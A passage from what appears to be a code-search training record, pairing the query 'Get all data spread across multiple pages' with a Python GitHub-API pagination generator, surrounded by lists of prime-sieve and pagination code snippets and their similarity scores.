4) // 3::2 * k] = False\n return np.r_[2, 3, ((3 * np.nonzero(sieve)[0][1:] + 1) | 1)]", "def primeSieve(n):\n result = []\n sieve = array.array('i', (True for i in range(0, n+1)))\n for k in range(2, n+1):\n if sieve[k]:\n result.append(k)\n i = k * k\n while i <= n:\n sieve[i] = False\n i += k\n return result", "def sieve(upto):\n return list(prime_numbers(upto))", "def EratosthenesSieve(N):\n numbers = [True] * (N+1)\n max_p = int(math.sqrt(N))\n for p in (i for i in range(2, max_p+1) if numbers[i]):\n for q in range(p*p, N+1, p):\n numbers[q] = False\n return [i for i in range(2, N+1) if numbers[i]]", "def primesfrom3to(n):\n sieve = numpy.ones(n//2, dtype=numpy.bool)\n for i in range(3,int(n**0.5)+1,2):\n if sieve[i//2]:\n sieve[i*i//2::i] = False\n return 2*numpy.nonzero(sieve)[0][1::]+1", "def sieve(n):\n s = [True] * (n + 1)\n for i in range(2, isqrt(n) + 1):\n if s[i]:\n for j in range(i + i, n + 1, i):\n s[j] = False\n return [i for i in range(2, n + 1) if s[i]]", "def primeSieve(n):\n\tsieve = numpy.ones(n/3 + (n%6==2), dtype=numpy.bool)\n\tfor i in xrange(1,int(n**0.5)/3+1):\n\t\tif sieve[i]:\n\t\t\tk=3*i+1|1\n\t\t\tsieve[ k*k/3 ::2*k] = False\n\t\t\tsieve[k*(k-2*(i&1)+4)/3::2*k] = False\n\treturn numpy.r_[2,3,((3*numpy.nonzero(sieve)[0][1:]+1)|1)]", "def isprime(n):\n if n % 2 == 0:return False\n return all(n % i for i in range(3, int(n**0.5) + 1, 2))", "def primesfrom2to( n ):\n sieve = numpy.ones( n / 3 + ( n % 6 == 2 ), dtype = numpy.bool )\n for i in range( 1, int( ( n ** 0.5 ) / 3 ) + 1 ):\n if sieve[i]:\n k = 3 * i + 1 | 1\n sieve[ k * k / 3 ::2 * k] = False\n sieve[k * ( k - 2 * ( i & 1 ) + 4 ) / 3::2 * k] = False\n return numpy.r_[2, 3, ( ( 3 * numpy.nonzero( sieve )[0][1:] + 1 ) | 1 )]", "def find_first_n_primes(n):\n primes = []\n to_check = 2\n\n while len(primes) < n:\n if is_prime(to_check, primes):\n primes.append(to_check)\n to_check += 1\n print('The first {} prime numbers are: {}'.format(n, primes))\n return set(primes)", "def EratosthenesSieve(N):\n numbers = [True] * (N + 1)\n max_p = int(math.sqrt(N))\n for p in (i for i in range(2, max_p + 1) if numbers[i]):\n for q in range(p * p, N + 1, p):\n numbers[q] = False\n return [i for i in range(2, N + 1) if numbers[i]]", "def prime_numbers_determination_list(n: int)-> List[bool]:\r\n is_prime = [True] * (n + 1)\r\n is_prime[0] = is_prime[1] = False\r\n\r\n for i in range(2, int(math.sqrt(n)+1)):\r\n if is_prime[i]:\r\n for j in range(i*2, n+1, i):\r\n is_prime[j] = False\r\n return is_prime", "def primesfrom2to(n):\n sieve = numpy.ones(n//3 + (n%6 == 2), dtype=numpy.bool)\n for i in range(1, int(n**0.5)//3+1):\n if sieve[i]:\n k=3*i+1|1\n sieve[k*k//3::2*k] = False\n sieve[k*(k-2*(i&1)+4)//3::2*k] = False\n return numpy.r_[2,3,((3*numpy.nonzero(sieve)[0][1:]+1)|1)]", "def proper_divisors(n):\r\n numbers = []\r\n for i in xrange(1, n):\r\n if n % i == 0:\r\n numbers.append(i)\r\n \r\n return numbers", "def prime_numbers(upto):\n sieve = BitArray(upto + 1, 1)\n for number in xrange(2, upto + 1):\n if not sieve[number]:\n continue\n yield number\n for multiple in xrange(number ** 2, upto + 1, number):\n sieve[multiple] = 0\n return", "def primes():\n yield 2\n candidate = 3\n while True:\n for i in range(3, int(sqrt(candidate)) + 1, 2):\n if (candidate % i) == 0:\n break\n else:\n yield candidate\n candidate += 2", "def primes():\n yield 2\n candidate = 3\n while True:\n for i in range(3, int(sqrt(candidate)) + 1, 2):\n if (candidate % i) == 0:\n break\n else:\n yield candidate\n candidate += 2", "def n_primes(n):\n primes = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59,\n 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127,\n 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193,\n 197, 199, 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269,\n 271, 277, 281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349,\n 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431,\n 433, 439, 443, 449, 457, 461, 463, 467, 479, 487, 491, 499, 503,\n 509, 521, 523, 541, 547, 557, 563, 569, 571, 577, 587, 593, 599,\n 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673,\n 677, 683, 691, 701, 709, 719, 727, 733, 739, 743, 751, 757, 761,\n 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839, 853, 857,\n 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947,\n 953, 967, 971, 977, 983, 991, 997][:n]\n\n if len(primes) < n:\n big_number = 2000\n while 'Not enough primes':\n primes = primes_from_2_to(big_number)[:n]\n if len(primes) == n:\n break\n big_number += 1000\n\n return primes", "def sieve_of_eratosthenes(n):\n res = [2]\n i = 3\n marked = set()\n while i <= n**.5:\n if i not in marked:\n res.append(i)\n j = 0\n while j <= n/i:\n marked.add(i + j*i)\n j += 1\n i += 2\n while i <= n:\n if i not in marked:\n res.append(i)\n i += 2\n return res", "def evansPrimes(n):\n assert n>1\n primes = []\n for i in range(1,n+1):\n sums = 0\n for j in range(1,i):\n sums += evansMod(i,j)*j\n if sums == 1:\n primes.append(i)\n #print(primes) #for testing only\n return primes", "def sieve(n):\n if n < 2:\n return []\n s = [True] * (n + 1)\n s[0], s[1] = False, False\n sq = int(n ** 0.5)\n for i in range(2, sq + 1):\n if s[i]:\n m = n // i - i\n s[i * i : n + 1 : i] = [False] * (m + 1)\n return [i for i in range(n + 1) if s[i]]", "def sieve_of_eratosthenes(n):\n primes = [True] * (n + 1)\n # because p is the smallest prime\n p = 2\n\n while p * p <= n:\n # if p is not marked as False, it is a prime\n if primes[p]:\n # mark all the multiples of number as False\n for i in range(p * 2, n + 1, p):\n primes[i] = False\n p += 1\n\n # getting all primes\n primes = [element for element in range(2, n + 1) if primes[element]]\n\n return primes", "def calculate_prime_numbers(max_number: int) -> list[int]:\n\n is_prime = [True] * max_number\n for i in range(2, isqrt(max_number - 1) + 1):\n if is_prime[i]:\n for j in range(i**2, max_number, i):\n is_prime[j] = False\n\n return [i for i in range(2, max_number) if is_prime[i]]", "def eratosthenes_sieve(n):\r\n\tnumbers = [True for i in range(n + 1)]\r\n\t\r\n\tp = 2\r\n\twhile (p**2 <= n):\r\n\t\tif numbers[p]:\r\n\t\t\tfor i in range(p**2, n + 1, p):\r\n\t\t\t\tnumbers[i] = False\r\n\t\tp += 1\r\n\t\t\r\n\tprimes = compress(range(2, n + 1),numbers[2:])\r\n\treturn list(primes)", "def primesfrom2to(n):\n sieve = numpy.ones(n/3 + (n%6==2), dtype=numpy.bool)\n for i in xrange(1,int(n**0.5)/3+1):\n if sieve[i]:\n k=3*i+1|1\n sieve[ k*k/3 ::2*k] = False\n sieve[k*(k-2*(i&1)+4)/3::2*k] = False\n return numpy.r_[2,3,((3*numpy.nonzero(sieve)[0][1:]+1)|1)]", "def count_prime():\n nums = []\n for i in range(2, 10000):\n if is_prime(i):\n nums.append(i)\n return nums", "def primesfrom2to(n):\n sieve = np.ones(n//3 + (n%6==2), dtype=np.bool)\n sieve[0] = False\n for i in range(int(n**0.5)//3+1):\n if sieve[i]:\n k=3*i+1|1\n sieve[ ((k*k)//3) ::2*k] = False\n sieve[(k*k+4*k-2*k*(i&1))//3::2*k] = False\n return np.r_[2,3,((3*np.nonzero(sieve)[0]+1)|1)]", "def prime_list(n):\n if n < 2:\n return []\n\n size = n//2\n prime_nums = []\n prime_nums.append(2)\n for i in range(1, size):\n val = i*2 + 1\n index = 0;\n for item in prime_nums:\n index+=1\n if val % item == 0:\n break\n if index == len(prime_nums):\n prime_nums.append(val)\n\n print(prime_nums)", "def prime_factorization(n):\n\t\n\tprimes = []\n\t\n\twhile not n % 2:\n\t\tprimes.append(2)\n\t\tn //= 2\n\t\n\tfor possible_factor in range(3, int(sqrt(n)) + 1, 2):\n\t\twhile not n % possible_factor:\n\t\t\tprimes.append(i)\n\t\t\tn //= possible_factor\n\t\n\tif n > 1:\n\t\tprimes.append(n)\n\treturn primes", "def divisors(n):\r\n numbers = []\r\n for i in xrange(1, n+1):\r\n if n % i == 0:\r\n numbers.append(i)\r\n return numbers", "def primes(lim):\n limsqrt = ceil(sqrt(lim))\n s = [ True ] * (lim + 1)\n for i in range(2, ceil(sqrt(lim))):\n if s[i]:\n k = 0\n while True:\n l = i * i + k * i\n if l > lim: break\n k += 1\n s[l] = False\n return [i for i in range(2, lim + 1) if s[i]]", "def sieve(n: int) -> Generator[int, None, None]:\n primes, p = [i for i in range(2, n + 1)], 2\n while p**2 < n:\n for i in primes:\n if i % p == 0 and i != p:\n primes.remove(i)\n p += 1\n yield from primes", "def return_prime_numbers_less_tahn_100():\r\n primes = []\r\n for num in range(100):\r\n is_prime = True\r\n for i in range(2, num):\r\n if num % i == 0:\r\n is_prime = False \r\n if is_prime:\r\n primes.append(num)\r\n return primes", "def primesfrom2to(n):\n sieve = np.ones(n//3 + (n%6==2), dtype=np.bool)\n for i in range(1,int(n**0.5)//3+1):\n if sieve[i]:\n k=3*i+1|1\n sieve[ k*k//3 ::2*k] = False\n sieve[k*(k-2*(i&1)+4)//3::2*k] = False\n return np.r_[2,3,((3*np.nonzero(sieve)[0][1:]+1)|1)]", "def isprime(n=936):\n if n < 3: return False\n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n\n def mr(n, _known_primes=[2, 3], _precision_for_huge_n=16, ):\n\n def _try_composite(a, d, n, s):\n if pow(a, d, n) == 1:\n return False\n for i in range(s):\n if pow(a, 2**i * d, n) == n-1:\n return False\n return True # n is definitely composite\n\n if n in _known_primes:\n return True\n if n in (0, 1):\n return False\n if any((n % p) == 0 for p in _known_primes):\n return False\n d, s = n - 1, 0\n while not d % 2:\n d, s = d >> 1, s + 1\n\n # Returns exact according to http://primes.utm.edu/prove/prove2_3.html\n if n < 1373653:\n return not any(_try_composite(a, d, n, s) for a in (2, 3))\n if n < 25326001:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5))\n if n < 118670087467:\n if n == 3215031751:\n return False\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7))\n if n < 2152302898747:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11))\n if n < 3474749660383:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13))\n if n < 341550071728321:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13, 17))\n # otherwise\n return not any(_try_composite(a, d, n, s)\n for a in _known_primes[:_precision_for_huge_n])\n\n def trial_division(n):\n if n < 2:\n return False\n if n < 4:\n return True\n if n % 2 == 0 or n % 3 == 0:\n return False\n\n limit = int(math.sqrt(n))\n divisor = 5\n\n while divisor <= limit:\n if n % divisor == 0 or n % (divisor + 2) == 0:\n return False\n divisor += 6\n\n return True\n\n if 30000000 < n < 341550071728321:\n return mr(n)\n else:\n return trial_division(n)", "def eratosthenes(n):\n assert n>1 #asserting n be a positive integer\n prime_list = []\n for i in range(2,n+1): #fills prime_list with all integers 2 <= i <= n\n prime_list.append(i)\n multiple = 2 #set to 2 because if set to 1 it will remove all elements from the list\n while multiple <= n/multiple:\n count = 2 #set to 2 because if set to 1 it will remove the prime itself from the list\n while count <= n/multiple:\n if count*multiple in prime_list: #checks if count*multiple is in list. needed because it could have already been removed\n prime_list.remove(count*multiple) #removes count*multiple\n count = count + 1\n multiple = multiple + 1\n #print(prime_list) #for testing only\n return prime_list", "def es_primo(n):\n \n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def nPrime(n):\n\n start = 1\n while n != 1:\n start += 2\n if isPrime(start):\n n -= 1\n # end of if\n\n return start", "def is_prime(n):\n if n < 2:\n return False\n if n == 2 or n == 3:\n return True\n elif n % 2 == 0:\n return False\n else:\n x = 0\n for i in range(3, n, 2):\n if n % i == 0:\n x = 1\n return x == 0", "def primesfrom2to(n):\n sieve = np.ones(n/3 + (n%6==2), dtype=np.bool)\n for i in xrange(1,int(n**0.5)/3+1):\n if sieve[i]:\n k=3*i+1|1\n sieve[ k*k/3 ::2*k] = False\n sieve[k*(k-2*(i&1)+4)/3::2*k] = False\n return np.r_[2,3,((3*np.nonzero(sieve)[0][1:]+1)|1)]" ]
[ "0.8414769", "0.8174812", "0.8154782", "0.8066897", "0.79940116", "0.7972602", "0.7941718", "0.79004717", "0.78921247", "0.7884613", "0.786188", "0.786017", "0.7860028", "0.78575575", "0.78575575", "0.7856777", "0.78546125", "0.78280634", "0.78155655", "0.7812109", "0.7803009", "0.77565897", "0.77513456", "0.77464074", "0.7738278", "0.77119255", "0.7673776", "0.76488686", "0.7648139", "0.7602413", "0.7601451", "0.7598183", "0.7583401", "0.7580974", "0.75691336", "0.7560983", "0.7552433", "0.7549309", "0.7539303", "0.7537891", "0.75343764", "0.75117826", "0.7509301", "0.7507737", "0.75073373", "0.7505705", "0.7494353", "0.74655443", "0.7446996", "0.74435246", "0.7441924", "0.74392486", "0.743494", "0.7427068", "0.7410845", "0.7368076", "0.73645544", "0.736068", "0.7349784", "0.7342157", "0.73385906", "0.73306334", "0.7322606", "0.73201823", "0.73176986", "0.7315742", "0.73156565", "0.7313854", "0.7310673", "0.72992986", "0.72975814", "0.7296903", "0.72931737", "0.72889304", "0.728688", "0.728688", "0.72827727", "0.7280612", "0.72803736", "0.7278763", "0.7278484", "0.7277886", "0.72751695", "0.72626424", "0.7250519", "0.7249935", "0.7249776", "0.72410107", "0.72366047", "0.7236361", "0.723324", "0.7217727", "0.7209007", "0.720805", "0.7206141", "0.7200622", "0.7198249", "0.7185404", "0.7174863", "0.7167392" ]
0.77787405
21
Get all data spread across multiple pages
def _get_all_data(self, resource): response = self._get_raising('{}{}?per_page=100&page=1'.format( self.GH_API_ENDPOINT, resource )) yield from response.json() while 'next' in response.links: response = self._get_raising(response.links['next']['url']) yield from response.json()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _paginatedRequest(allPages, *args):\n data = []\n currentPage = 0\n while True:\n newData = Gw2Spidy._request(*(args + (str(currentPage),)))\n if not allPages:\n return newData['results']\n data.extend(newData['results'])\n currentPage = currentPage + 1\n if newData['page'] == newData['last_page']:\n break\n return data", "def get_data(self):\n has_next_page = True\n page = 1\n while has_next_page:\n print(f'Getting page {page}')\n response = self.get_articles(\n page=page,\n size=200,\n order_by='extracted_at',\n order_type='asc'\n )\n pagination = response.get('pagination')\n has_next_page = pagination.get('has_next')\n self.save_articles(response.get('articles'))\n page += 1\n time.sleep(2.5)", "def _get_pages(self,url,params,section):\n if self.verbose:\n print('Get Pages for {}'.format(url))\n print(params)\n page = 1\n maxPage = 1\n \n all_results = []\n this_batch = []\n while page <= maxPage: \n \n params['page']=page\n resp = self._get(url=url,params=params)\n maxPage = int(resp.headers.get('X-Total-Page-Count',0))\n try:\n results=resp.json()\n except:\n results=None\n if isinstance(results,(list,dict)):\n if 'errors' in results:\n print(results['errors'])\n return results\n \n this_batch = results[section]\n all_results.extend(this_batch)\n\n page+=1\n else:\n if self.verbose:\n print(\"PROBLEM\")\n return results\n\n return all_results", "def fetch_pages(query_val, page_num):\n \n for page_id in range(1 + page_num + 1):\n try:\n output = fetch_data(query_val, page_id)\n for j in output:\n print(str(j))\n \n except Exception as e:\n print(e)", "def page_data():\n return scrape()", "def get_paginate_data(self, *args, **kwargs):\n pass", "def _get_allpages(self, url:str, paramsdict:Dict[str,str]):\n r1 = self._get_dict_from_url(url, paramsdict)\n r = [r1]\n #display(r)\n if 'total_pages' in r1:\n # print('more than one page')\n for next_page in range(2, r1['total_pages']+1):\n # print(f\"load page {next_page} \")\n r.append(self._get_dict_from_url(url, {**paramsdict, 'page':next_page}))\n # print(len(r))\n # print([len(rx['results']) for rx in r])\n results = [entry for rx in r for entry in rx['results'] ]\n\n return results", "def by_page(self) -> global___Snippet.PaginatedResponseHandling.ByPage:", "def by_page(self) -> global___Snippet.PaginatedResponseHandling.ByPage:", "def get_json():\n data_list = []\n\n for page in range(1,13):\n url = BASE_URL + STYLE_URL + \"&\" + PAGINATION_URL + str(page)\n print(page, \"pages processed\")\n try:\n response = requests.get(url, timeout=METADATA_REQUEST_TIMEOUT)\n data = response.json()['Paintings']\n parse_data(data_list, data)\n except requests.exceptions.RequestException as e:\n print(e)\n sys.exit(1)\n\n return data_list", "def getAllListPage():\n firstPage = city + '/line1'\n data = urlopen(firstPage).read().decode('gbk')\n urlList = getLineTypeList(data)\n urlList.append(firstPage)\n num = len(urlList)\n i = 0\n p = Pool(processes=4)\n pageData = p.map(readData, urlList)\n# manager = Manager()\n# pageData = manager.list()\n# while i < num:\n# procline = Process(target=readData, args=(urlList[i], pageData,))\n# procline.start()\n# procline.join()\n# i += 1\n return pageData", "def get_top_100_data(self):\n self.driver.get(self.TOP_100_BOOKS_URL)\n\n cookies_button = self.driver.find_element_by_xpath(\"/html/body\")\n cookies_button.click()\n\n books_list = []\n\n print(\"Getting books data from page 1\")\n try:\n for page_numb in range(self.FIRST_PAGE_TO_CLICK, self.NMB_OF_PAGES+2):\n content = self.driver.page_source\n page_soup = BeautifulSoup(content, features='html.parser')\n books_list += self._get_books_from_page(page_soup)\n\n if page_numb == self.NMB_OF_PAGES+1:\n break\n self._load_page(page_numb)\n print(f\"Getting books data from page {page_numb}\")\n except:\n pass\n\n return books_list", "def get_all_pages(session, url, size, params=None):\n # Get first page to get results and detect number fo pages\n response = get_single_page(session, url, size, params)\n parameters = {}\n # Get number of indexes for this request\n entries = int(response.headers['X-Total'])\n # Calculate amount of pages that need to be requested\n pages = int(entries / size) + (entries % size > 1)\n # Data retrived by the request\n data = response.json()\n\n # Add params if custom parameters\n if params is not None:\n parameters.update(params)\n # Detect if more than 1 page\n if pages > 1:\n # Range between 2 and pages + 1 to get the last one as well\n for page in range(2, pages + 1):\n # Update parameters with page[number] parameter\n parameters.update({'page[number]': page})\n # Make the request\n r = get_single_page(session, url, size, params=parameters)\n try:\n # Merge data from request with already received data\n new_data = r.json()\n if new_data == '[]':\n continue\n data += new_data\n except json.JSONDecodeError:\n print('Error when decoding json, please try again...')\n exit(1)\n\n return data", "def get_page_data(table_name: str) -> List:\r\n page_data: List = []\r\n for page in range(1, 2):\r\n url: str = 'https://www.newegg.com/p/pl?d={}&page={}'.format(table_name, page)\r\n page_text = requests.get(url).content\r\n page_data.append(page_text)\r\n sleep(randint(3, 10))\r\n return page_data", "def load_data(page: int) -> DataResponse:\n assert page > 0\n items_per_page = 4\n # we number pages from 1, so remove 1 from it to start from beginning of the list\n data = database[(page-1)*items_per_page:page*items_per_page]\n return DataResponse(data=data)", "def data(self):\n previous_url = None\n page = int(self.request.GET.get('page', 1))\n next_url = self.request.resource_url(self, query={\"page\": page + 1})\n pagination = (page - 1) * self.page_size\n\n count = mongo['readable-api'].foo.count()\n\n if page > 1:\n previous_url = self.request.resource_url(\n self,\n query={\"page\": page - 1},\n )\n if (self.page_size * page) >= count:\n next_url = None\n\n results = [\n r for r in\n mongo['readable-api'].foo.find(\n limit=self.page_size,\n skip=pagination,\n )\n ]\n\n return {\n \"count\": count,\n \"next\": next_url,\n \"previous\": previous_url,\n \"results\": [\n {\n \"url\": self.request.resource_url(\n self.make_child(result['foo'])\n ),\n **result\n }\n for result in results\n ],\n \"schema\": self.schema,\n }", "def page_through(app_id, app_secret):\n has_next_page = True\n in_date_range = True\n \n #we only want to keep the articles that were returned from the NYtimes api, so this creates a list of target urls\n with open('output/article_search.json') as f:\n nyt_dat = json.load(f)\n nyt_urls = []\n for i in nyt_dat:\n nyt_urls.append(core_url(i['web_url']))\n\n items = get_page(app_id, app_secret)\n process_items(items, nyt_urls)\n\n while has_next_page & in_date_range:\n if 'paging' not in items.keys():\n has_next_page=False\n\n if items['data'][0]['created_time'][0:7]=='2016-10':\n in_date_range = False\n\n items = json.loads(request_until_succeed(items['paging']['next']))\n process_items(items, nyt_urls)", "def page_common_logic(fs, per_page, id=1):\n requested_record = Common.collection_creation(fs)\n pages = int(len(requested_record) / per_page)\n quot = int(len(requested_record) % per_page)\n if quot != 0:\n pages = pages + 1\n if id == 1:\n page_list = Common.index_list(0, pages)\n data_list = requested_record[0:per_page]\n else:\n page_list = Common.index_list(0, pages)\n data_list = requested_record[\n (per_page * (id - 1)) : (per_page * (id - 1)) + per_page\n ]\n return page_list, data_list", "def fetch_paginated_data(url):\n data = []\n while url:\n response = requests.get(url)\n response_json = response.json()\n data.extend(response_json[\"results\"])\n url = response_json[\"next\"]\n return data", "def paginated(self) -> global___Snippet.Paginated:", "def query(self, page) -> [str, dict]:", "def iterResponsePages(service, payload, verbose, slow_down):\n token = 0\n next_page = True\n data = {'reports': []}\n\n\n while next_page:\n if verbose:\n print(f'Fetching rows starting at position: {token}')\n if slow_down > 0:\n time.sleep(slow_down)\n \n data_tmp = service.reports().batchGet(body=payload).execute()\n token = data_tmp.get('reports')[0].get('nextPageToken')\n\n if token != None:\n payload.get('reportRequests')[0].update({'pageToken': token})\n else:\n next_page = False\n payload.get('reportRequests')[0].update({'pageToken': '0'})\n\n for report in data_tmp.get('reports'):\n data.get('reports').append(report)\n\n return data", "def __update_page_results(self):\n \n pages = []\n\n # Request id for pages associated to search term \n page_fields='page&fields=id,name,username,link'\n term = self.track[self.track_index]\n self.track_index += 1\n \n # Define url for http request to get pages id associated to search term \n page_request_url = 'https://graph.facebook.com/search?q=%s&type=%s&limit=%d&access_token=%s'%(term,page_fields,self.page_lim,self.access_token)\n \n while(True):\n # Try 100 times\n for i in range(100):\n \n page_response = requests.get(page_request_url)\n \n if 'error' in page_response.json() or page_response.status_code <> 200:\n print \"\\n !---- ERROR IN SEARCH REQUEST ----!\"\n print time.ctime()\n print \"Status Code: \", page_response.status_code\n print page_response.json()\n #raise StopIteration()\n time.sleep(1800) # Wait 30 minutes\n else:\n break\n \n page_json = page_response.json()\n pages = pages + page_json['data']\n time.sleep(5)\n \n if 'next' in page_json['paging']:\n page_request_url = page_json['paging']['next']\n else:\n break\n \n print \"Term: %s, Pages: %d\"%(term, len(pages))\n return pages", "def fetch_main_index(self):\n\n path = G_PATH1 % self.options['lastname']\n url = '%s://%s/%s' % (G_PROT, G_HOST, path)\n\n html_content = self.http_client.http_get(url)\n try:\n tree = html.fromstring(html_content)\n except: #Exception as e\n pass\n # @todo\n\n pages = []\n\n for link in tree.xpath('//td[@class=\"gt\"]/a'):\n\n ilosc = 0\n try:\n ilosc = int(link.text_content().strip())\n except Exception: # as e\n pass\n\n if ilosc > 0:\n url = link.values()[0]\n count = int(link.text_content().strip())\n\n rid_w = HttpClient.find_params_in_url(url)\n self.logger.info(u'%s %s %s', rid_w['w'], rid_w['rid'], str(count))\n\n area = {\n 'url': u'http://geneteka.genealodzy.pl/%s' % url,\n 'rid': rid_w['rid'],\n 'w': rid_w['w'],\n 'wid': rid_w['wid'],\n 'count': count,\n }\n pages.append(area)\n\n return pages", "def paginate_data(self, data, page):\n return data, {}", "def page(self):\r\n limit = self.get_limit()\r\n offset = self.get_offset()\r\n count = self.get_count()\r\n objects = self.get_slice(limit, offset)\r\n meta = {\r\n 'offset': offset,\r\n 'limit': limit,\r\n 'total_count': count}\r\n\r\n if limit:\r\n meta['previous'] = self.get_previous(limit, offset)\r\n meta['next'] = self.get_next(limit, offset, count)\r\n\r\n return {\r\n self.collection_name: objects, 'meta': meta}", "def get_data(authenticated_headers: dict, url: str, odata_filter: str = None, max_pages: int = None) -> dict:\n\n next_link_url = None\n\n if odata_filter:\n count_data = requests.get(url + '?$filter=' + odata_filter, headers=authenticated_headers, verify=False)\n\n if count_data.status_code == 400:\n print(\"Received an error while retrieving data from %s:\" % url + '?$filter=' + odata_filter)\n pprint(count_data.json()['error'])\n return {}\n\n count_data = count_data.json()\n if count_data['@odata.count'] <= 0:\n print(\"No results found!\")\n return {}\n else:\n count_data = requests.get(url, headers=authenticated_headers, verify=False).json()\n\n if 'value' in count_data:\n data = count_data['value']\n else:\n data = count_data\n\n if '@odata.nextLink' in count_data:\n # Grab the base URI\n next_link_url = '{uri.scheme}://{uri.netloc}'.format(uri=urlparse(url)) + count_data['@odata.nextLink']\n\n i = 1\n while next_link_url is not None:\n # Break if we have reached the maximum number of pages to be returned\n if max_pages:\n if i >= max_pages:\n break\n else:\n i = i + 1\n response = requests.get(next_link_url, headers=authenticated_headers, verify=False)\n next_link_url = None\n if response.status_code == 200:\n requested_data = response.json()\n if requested_data['@odata.count'] <= 0:\n print(\"No results found!\")\n return {}\n\n # The @odata.nextLink key is only present in data if there are additional pages. We check for it and if it\n # is present we get a link to the page with the next set of results.\n if '@odata.nextLink' in requested_data:\n next_link_url = '{uri.scheme}://{uri.netloc}'.format(uri=urlparse(url)) + \\\n requested_data['@odata.nextLink']\n\n if 'value' in requested_data:\n data += requested_data['value']\n else:\n data += requested_data\n else:\n print(\"Unknown error occurred. Received HTTP response code: \" + str(response.status_code) +\n \" with error: \" + response.text)\n raise Exception(\"Unknown error occurred. Received HTTP response code: \" + str(response.status_code)\n + \" with error: \" + response.text)\n\n return data", "def parallel_get_pages(args):\n n_requests, from_id, step, index_name, es = args\n all_sites_arr = []\n for _ in range(n_requests):\n waiting_response_time = 0\n for i in range(5):\n time.sleep(waiting_response_time)\n\n try:\n res = es.search(\n index=index_name,\n body={\n \"from\": from_id,\n \"query\": {\n \"match_all\": {}\n },\n \"size\": step,\n \"sort\": {\n \"site_id\": \"asc\"\n }\n },\n request_timeout=1000\n )\n print(\"Got %d Hits\" % len(res['hits']['hits']))\n\n for site in res['hits']['hits']:\n all_sites_arr.append({\n \"link\": site[\"_source\"][\"link\"],\n \"hyperlinks\": site[\"_source\"][\"hyperlinks\"]\n })\n\n break\n except TransportError as exc:\n print('index setup error', exc)\n\n waiting_response_time = math.exp(i + 1)\n\n from_id += step\n time.sleep(10)\n\n return all_sites_arr", "def get_page(self, page: int = 1, page_size: int = 10) -> List[List]:\n assert isinstance(page, int) and page > 0\n assert isinstance(page_size, int) and page_size > 0\n self.dataset()\n index_tuple: Tuple = index_range(page, page_size)\n start_index: int = index_tuple[0]\n end_index: int = index_tuple[1]\n return self.__dataset[start_index:end_index]", "def mor_prepare_data():\n prices, locations, areas, links = [], [], [], []\n for i in range(START_PAGE, SEARCHING_DEPTH+1):\n handler = requests.get(main_url, params={\"page\": str(i)})\n soup = bs4.BeautifulSoup(handler.text, 'lxml')\n heads = soup.find_all(\"header\")\n once = True\n for head in heads:\n if head.find(\"meta\", {\"itemprop\": \"category\"}) and once:\n\n raw_price = head.find(\"meta\", {\"itemprop\": \"price\"})\n price = int(float(raw_price[\"content\"]) if raw_price else \"\")\n\n raw_loc_list = head.find(\"h2\",\n {\"class\": \"single-result__title\"}).getText().strip().split(\n \", \")\n found = False\n for loc in raw_loc_list:\n if location_mapper[CITY].get(loc.lower(), 0):\n location = location_mapper[CITY][loc.lower()]\n\n found = True\n break\n if not found:\n location = \"\"\n if DEBUG_MODE:\n print(raw_loc_list)\n\n raw_area = head.find(\"p\", {\n \"class\": \"single-result__price single-result__price--currency\"}).getText().strip().split()\n if price and location:\n square_price = raw_area[0] if len(raw_area) == 2 else \"\".join(\n (raw_area[0], raw_area[1]))\n\n area = int(price / float(square_price.replace(\",\", \".\")))\n link_url = head.find('a')['href']\n\n if location and area and link_url:\n prices.append(price) if price < PRICE_UPPER_LIMIT else prices.append(\n PRICE_UPPER_LIMIT)\n locations.append(location)\n areas.append(area) if area < AREA_UPPER_LIMIT else areas.append(\n AREA_UPPER_LIMIT)\n links.append(link_url)\n\n return prices, locations, areas, links", "def get_series(self, page=0, filters=''):", "def results(self):\n page = []\n\n for i, item in enumerate(super(VideoCarouselTile, self).results()):\n page.append(item)\n if (i + 1) % 3 == 0:\n yield page\n page = []\n if page:\n yield page", "def test_get_multiple_pages_lro(client):\n from azure.mgmt.core.polling.arm_polling import ARMPolling\n poller = client.paging.begin_get_multiple_pages_lro(polling=ARMPolling(timeout=0, request_id=\"test\"))\n pager = poller.result()\n\n items = list(pager)\n\n assert len(items) == 10\n assert items[0][\"properties\"][\"id\"] == 1\n assert items[1][\"properties\"][\"id\"] == 2", "def iter_pages(self) -> Generator[Tuple[Optional[List[dict]], int], None, None]:\n # retrieves the data for the given url\n data_list, response, result = self.retrieve_data(self.url)\n\n if result != GithubApiResult.SUCCESS:\n self.logger.debug(\"Failed to retrieve the data even though 10 attempts were given\")\n yield None, None\n return\n\n # this retrieves the page for the given url\n page_number = get_url_page_number(self.url)\n\n # yields the first page of data and its page number\n yield data_list, page_number\n\n while 'next' in response.links.keys():\n\n # gets the next page from the last responses header\n next_page = response.links['next']['url']\n\n # Here we don't need to pass in params with the page, or the default params because the url from the headers already has those values\n data_list, response, result = self.retrieve_data(next_page)\n\n if result != GithubApiResult.SUCCESS:\n self.logger.debug(f\"Failed to retrieve the data for even though 10 attempts were given. Url: {next_page}\")\n return\n\n page_number = get_url_page_number(next_page)\n\n # if either the data or response is None then yield None and return\n if data_list is None or response is None:\n return\n\n # yield the data from the page and its number\n yield data_list, page_number", "def _get_assets_for_page(request, course_key, current_page, page_size, sort):\r\n start = current_page * page_size\r\n\r\n return contentstore().get_all_content_for_course(\r\n course_key, start=start, maxresults=page_size, sort=sort\r\n )", "def _fetch_items(self):\n url = 